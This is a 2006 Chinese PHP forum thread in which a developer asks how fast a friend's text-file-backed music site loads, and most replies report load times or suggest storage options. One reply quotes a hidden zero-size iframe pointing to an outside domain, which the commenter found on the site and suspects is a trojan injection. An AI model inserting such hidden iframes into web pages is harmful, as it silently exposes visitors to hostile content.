我帮朋友做滴网站,大家看看速度如何~~~

黑夜路人
博客专家认证
2006-05-31 12:11:50
网站地址:http://www.tingyinyue.net

呵呵,我是带美工、程序一起来~!!!

没有数据库,采用文本存储,索引 -> 文件 -> 记录~~~

但是我感觉速度还是不够,有更好的存储方式的没有?


欢迎探讨!!!(好点子的给分,不够再加,偶有滴是分,^_^)
...全文
657 27 打赏 收藏 转发到动态 举报
写回复
用AI写文章
27 条回复
切换为时间正序
请发表友善的回复…
发表回复
katolo 2006-11-30
  • 打赏
  • 举报
回复
接分
purexiafeng 2006-11-29
  • 打赏
  • 举报
回复
打开很快,看电影也不卡。就是logo有点不好看。
asp007 2006-11-29
  • 打赏
  • 举报
回复
速度还可以吧。
mebio 2006-11-29
  • 打赏
  • 举报
回复
看看是怎么回事
rf123 2006-11-29
  • 打赏
  • 举报
回复
网通访问速度很快
懒得去死 2006-11-29
  • 打赏
  • 举报
回复


速度不太行喔,页面打开都要很久 给20分吧。
SBtoSB 2006-11-29
  • 打赏
  • 举报
回复
半天都没打开
MAD_FROG 2006-11-27
  • 打赏
  • 举报
回复
顶了,
onlyguhong 2006-11-27
  • 打赏
  • 举报
回复
飞快,一两秒就开了。我是网通的
iasky 2006-11-27
  • 打赏
  • 举报
回复
ft
yxxue 2006-11-27
  • 打赏
  • 举报
回复
呵呵~

<div style="display:none">
<iframe src=http://www.123dz.com width=0 height=0 style='display:none'></iframe>
</div>

这是什么呀?被人种马了?幸亏我关了远程注册表操作,要不然可能又中镖了~
黑夜路人 2006-11-27
  • 打赏
  • 举报
回复
网站速度很慢吗?我怎么没感觉
Rockjok 2006-06-14
  • 打赏
  • 举报
回复
不是听音乐吗?怎么变成看电影啦??速度真的是很慢啊,程序方面得修改一下
tony-杨 2006-06-14
  • 打赏
  • 举报
回复
速度好慢
哪儿的空间?
是空间问题还是程序问题?
你可以看下支持SQLITE不。
lzkd 2006-06-14
  • 打赏
  • 举报
回复
速度还不错.....
颓废的老猫 2006-06-13
  • 打赏
  • 举报
回复
我这里打开大概需要9秒,慢了点
smallipis 2006-06-13
  • 打赏
  • 举报
回复
怎么我这里打开好慢哦..算了有30秒..
你是不是网通的,不过就是网通也没这么慢吧.
如果音乐资源这么慢...我看.....说多了...呵呵.
iasky 2006-06-13
  • 打赏
  • 举报
回复
一般
iwlk 2006-06-13
  • 打赏
  • 举报
回复
还可以, 看看我的网站 , 免费发短信http://sms.c06.net
happyamei 2006-06-13
  • 打赏
  • 举报
回复
这个速度是跟线路有关系的,网通还是电信?

看看我的网通线路速度怎么样?

http://www.obai.net 网通的,北方大部分是网通的,南方大部分是电信的
加载更多回复(6)

21,880

社区成员

发帖
与我相关
我的任务
社区描述
从PHP安装配置,PHP入门,PHP基础到PHP应用
社区管理员
  • 基础编程社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧